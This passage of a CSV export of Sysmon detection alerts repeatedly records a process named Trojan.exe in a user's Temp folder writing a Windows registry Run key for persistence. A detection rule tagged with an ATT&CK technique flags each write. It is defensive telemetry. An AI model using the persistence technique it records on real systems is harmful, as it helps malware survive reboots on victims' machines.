{df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:58.520323300Z"",""eventRecordID"":""1575"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:58.517\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:58.517"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:10.615",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:57.502 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:57.504275500Z"",""eventRecordID"":""1572"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:57.502\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:57.502"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:09.599",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:56.486 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:56.490701600Z"",""eventRecordID"":""1568"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:56.486\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:56.486"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:08.587",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:55.455 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:55.461176900Z"",""eventRecordID"":""1566"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:55.455\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:55.455"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:07.553",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:54.424 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:54.431912100Z"",""eventRecordID"":""1563"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:54.424\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:54.424"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:06.537",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:53.408 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:53.420291600Z"",""eventRecordID"":""1561"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:53.408\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:53.408"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:05.538",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:52.393 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:52.394518700Z"",""eventRecordID"":""1556"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:52.393\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:52.393"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:04.490",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:51.377 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:51.377895700Z"",""eventRecordID"":""1554"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:51.377\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:51.377"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:03.380",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:50.361 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:50.369824700Z"",""eventRecordID"":""1553"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:50.361\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:50.361"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:02.349",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:49.346 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:49.352085800Z"",""eventRecordID"":""1550"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:49.346\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:49.346"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:00.506",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:48.331 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:25:48.333307200Z"",""eventRecordID"":""1548"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:25:48.331\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:25:48.331"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:23:00.475",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:25:47.314 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: 